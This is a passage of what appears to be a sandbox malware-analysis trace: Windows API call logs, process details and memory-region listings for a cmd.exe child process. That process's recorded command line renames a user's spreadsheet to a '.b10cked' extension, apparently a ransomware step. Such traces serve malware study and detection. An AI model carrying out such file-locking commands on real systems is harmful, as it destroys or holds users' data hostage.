(_FileHandle=4) returned 0x54 [0128.906] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.907] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.907] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.908] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.909] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.909] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.910] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x32, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x32, lpOverlapped=0x0) returned 1 [0128.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.911] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.911] _close (_FileHandle=4) returned 0 [0128.911] FindNextFileW (in: hFindFile=0x90eb8, lpFindFileData=0x2af4ec | out: lpFindFileData=0x2af4ec) returned 0 [0128.911] GetLastError () returned 0x12 [0128.911] FindClose (in: hFindFile=0x90eb8 | out: hFindFile=0x90eb8) returned 1 [0128.912] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0128.959] _close (_FileHandle=3) returned 0 [0128.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.959] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.959] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.959] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.960] SetConsoleInputExeNameW () returned 0x1 [0128.960] GetConsoleOutputCP () returned 0x1b5 [0128.960] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.960] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.960] exit (_Code=0) Process: id = "87" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16880" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10684 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10685 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10686 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10687 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10688 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10689 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10690 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10691 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10692 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10693 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10854 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10855 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10856 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10857 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 10858 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 10859 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10860 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10861 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10862 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10863 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10864 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10865 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10866 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10867 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10868 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 10869 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10870 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10871 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10872 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10873 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10874 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10875 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 10876 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 10877 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 143 os_tid = 0x7fc [0128.790] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa3c | out: lpSystemTimeAsFileTime=0x26fa3c*(dwLowDateTime=0x86b38e40, dwHighDateTime=0x1d440a9)) [0128.790] GetCurrentProcessId () returned 0x320 [0128.790] GetCurrentThreadId () returned 0x7fc [0128.790] GetTickCount () returned 0x29404 [0128.790] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa34 | out: lpPerformanceCount=0x26fa34*=18557942489) returned 1 [0128.791] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0128.791] __set_app_type (_Type=0x1) [0128.791] __p__fmode () returned 0x76b331f4 [0128.791] __p__commode () returned 0x76b331fc [0128.791] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0128.791] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0128.791] GetCurrentThreadId () returned 0x7fc [0128.791] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7fc) returned 0x38 [0128.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.791] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0128.791] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.791] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.791] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9cc | out: phkResult=0x26f9cc*=0x0) returned 0x2 [0128.792] VirtualQuery (in: lpAddress=0x26fa03, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0128.792] GetConsoleOutputCP () returned 0x1b5 [0128.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.792] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0128.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.792] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.792] GetConsoleMode (in: 